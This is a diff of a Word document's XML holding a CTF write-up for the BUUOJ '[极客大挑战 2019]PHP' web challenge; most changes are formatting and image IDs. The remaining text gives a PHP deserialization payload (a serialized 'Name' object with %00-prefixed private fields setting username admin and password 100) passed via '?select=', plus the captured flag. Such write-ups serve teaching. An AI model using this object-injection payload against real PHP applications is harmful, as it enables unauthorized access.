--- a/buuoj_writeup/web/[极客大挑战 2019]PHP/writeup.docx
+++ b/buuoj_writeup/web/[极客大挑战 2019]PHP/writeup.docx
@@ -4,8 +4,11 @@
   <w:body>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="542DE35F" wp14:editId="27E19FC6">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1631FE21" wp14:editId="16EEEDB7">
             <wp:extent cx="3773882" cy="872364"/>
             <wp:effectExtent l="0" t="0" r="0" b="4445"/>
             <wp:docPr id="1" name="图片 1"/>
@@ -40,6 +43,8 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -61,8 +66,11 @@
         <w:t xml:space="preserve">Using </w:t>
       </w:r>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BF40511" wp14:editId="79FA21A4">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67224205" wp14:editId="284BB107">
             <wp:extent cx="5274310" cy="188595"/>
             <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
             <wp:docPr id="2" name="图片 2"/>
@@ -99,15 +107,10 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
         <w:t>f</w:t>
       </w:r>
       <w:r>
@@ -116,8 +119,11 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="406FC7A2" wp14:editId="409E7178">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AD33301" wp14:editId="1358A8EC">
             <wp:extent cx="5274310" cy="936625"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
             <wp:docPr id="3" name="图片 3"/>
@@ -190,14 +196,12 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E10D1F3" wp14:editId="2804CF4A">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B552D71" wp14:editId="1DBD1B60">
             <wp:extent cx="5274310" cy="963930"/>
             <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
             <wp:docPr id="4" name="图片 4"/>
@@ -239,11 +243,6 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>flag.php</w:t>
@@ -252,8 +251,11 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FA0E78" wp14:editId="2F09E969">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ACFE4C0" wp14:editId="14878068">
             <wp:extent cx="4220164" cy="905001"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="5" name="图片 5"/>
@@ -302,8 +304,11 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="262B1144" wp14:editId="5D422063">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D55C390" wp14:editId="4E3C447A">
             <wp:extent cx="4105848" cy="1400370"/>
             <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
             <wp:docPr id="6" name="图片 6"/>
@@ -370,8 +375,11 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6986E777" wp14:editId="33B8A35F">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="791BDC00" wp14:editId="3CD3EA7B">
             <wp:extent cx="5274310" cy="1915160"/>
             <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
             <wp:docPr id="8" name="图片 8"/>
@@ -408,14 +416,12 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C263AD7" wp14:editId="61AC4BF4">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28D73B8A" wp14:editId="6413E237">
             <wp:extent cx="4172532" cy="1114581"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
             <wp:docPr id="9" name="图片 9"/>
@@ -453,8 +459,11 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C0E9008" wp14:editId="73DFF733">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69DA43F3" wp14:editId="756DB7A9">
             <wp:extent cx="5274310" cy="3169285"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
             <wp:docPr id="10" name="图片 10"/>
@@ -543,9 +552,12 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F8B108B" wp14:editId="44DDC1F7">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D2BCE4D" wp14:editId="649615D8">
             <wp:extent cx="5274310" cy="1536065"/>
             <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
             <wp:docPr id="13" name="图片 13"/>
@@ -599,10 +611,7 @@
         <w:t>t</w:t>
       </w:r>
       <w:r>
-        <w:t>hen</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> input is </w:t>
+        <w:t xml:space="preserve">hen input is </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -675,10 +684,7 @@
         <w:t>s</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">et </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">et  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -699,9 +705,11 @@
           <w:szCs w:val="14"/>
           <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
         </w:rPr>
-        <w:t>:4:"Name":</w:t>
-      </w:r>
-      <w:r>
+        <w:t>:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:color w:val="78CF8A"/>
@@ -709,9 +717,15 @@
           <w:szCs w:val="14"/>
           <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
         </w:rPr>
-        <w:t>3</w:t>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Field names for private fields When serialized, both class and field names are prefixed with \0 (that is, %00)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:color w:val="78CF8A"/>
@@ -719,27 +733,12 @@
           <w:szCs w:val="14"/>
           <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
         </w:rPr>
-        <w:t>:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
-          <w:color w:val="78CF8A"/>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
-        </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Field names for private fields When serialized, both class and field names are prefixed with \0 (that is, %00)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t xml:space="preserve">set  </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
           <w:color w:val="78CF8A"/>
@@ -747,11 +746,9 @@
           <w:szCs w:val="14"/>
           <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
         </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t xml:space="preserve">set  </w:t>
-      </w:r>
+        <w:t>O</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
@@ -760,98 +757,35 @@
           <w:szCs w:val="14"/>
           <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
         </w:rPr>
-        <w:t>O</w:t>
+        <w:t>:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>l</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ast input is </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>?select=</w:t>
+      </w:r>
+      <w:r>
+        <w:t>O:4:"Name":</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>3:{</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="78CF8A"/>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
-        </w:rPr>
-        <w:t>:4:"Name":3:{s:14:"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="78CF8A"/>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
-        </w:rPr>
-        <w:t>%00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="78CF8A"/>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
-        </w:rPr>
-        <w:t>Name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="78CF8A"/>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
-        </w:rPr>
-        <w:t>%00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="78CF8A"/>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
-        </w:rPr>
-        <w:t>username";s:5:"admin";s:14:"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="78CF8A"/>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
-        </w:rPr>
-        <w:t>%00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="78CF8A"/>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
-        </w:rPr>
-        <w:t>Name</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="78CF8A"/>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
-        </w:rPr>
-        <w:t>%00</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:color w:val="78CF8A"/>
-          <w:sz w:val="14"/>
-          <w:szCs w:val="14"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="383F4B"/>
-        </w:rPr>
-        <w:t>password";i:100;}</w:t>
+        <w:t>s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -860,34 +794,6 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>l</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">ast input is </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>?select=</w:t>
-      </w:r>
-      <w:r>
-        <w:t>O:4:"Name":</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>3:{</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
         <w:t>a</w:t>
       </w:r>
       <w:r>
@@ -896,8 +802,11 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="470C9C42" wp14:editId="3D000893">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6CD0F04F" wp14:editId="269FF5AB">
             <wp:extent cx="5274310" cy="802640"/>
             <wp:effectExtent l="0" t="0" r="2540" b="0"/>
             <wp:docPr id="14" name="图片 14"/>
@@ -939,26 +848,25 @@
         <w:jc w:val="left"/>
         <w:textAlignment w:val="baseline"/>
         <w:rPr>
+          <w:rFonts w:ascii="KaiTi" w:eastAsia="KaiTi" w:hAnsi="KaiTi" w:cs="宋体"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="KaiTi" w:eastAsia="KaiTi" w:hAnsi="KaiTi" w:cs="宋体" w:hint="eastAsia"/>
           <w:color w:val="000000"/>
           <w:kern w:val="0"/>
           <w:sz w:val="30"/>
           <w:szCs w:val="30"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="KaiTi" w:eastAsia="KaiTi" w:hAnsi="KaiTi" w:cs="宋体" w:hint="eastAsia"/>
-          <w:color w:val="000000"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-        </w:rPr>
         <w:t>flag{33ac5002-f924-4165-a2dc-ca6c46e786b5}</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
-    </w:p>
+    </w:p>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>
@@ -1363,6 +1271,7 @@
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
+    <w:rsid w:val="006C4DD0"/>
     <w:pPr>
       <w:widowControl w:val="0"/>
       <w:jc w:val="both"/>
@@ -1400,46 +1309,10 @@
     <w:basedOn w:val="a0"/>
     <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="004D2141"/>
+    <w:rsid w:val="006C4DD0"/>
     <w:rPr>
       <w:color w:val="0563C1" w:themeColor="hyperlink"/>
       <w:u w:val="single"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:styleId="a4">
-    <w:name w:val="Unresolved Mention"/>
-    <w:basedOn w:val="a0"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="004D2141"/>
-    <w:rPr>
-      <w:color w:val="605E5C"/>
-      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="token">
-    <w:name w:val="token"/>
-    <w:basedOn w:val="a0"/>
-    <w:rsid w:val="00617504"/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="a5">
-    <w:name w:val="Normal (Web)"/>
-    <w:basedOn w:val="a"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="00C84E79"/>
-    <w:pPr>
-      <w:widowControl/>
-      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
-      <w:jc w:val="left"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-      <w:kern w:val="0"/>
-      <w:sz w:val="24"/>
-      <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
 </w:styles>
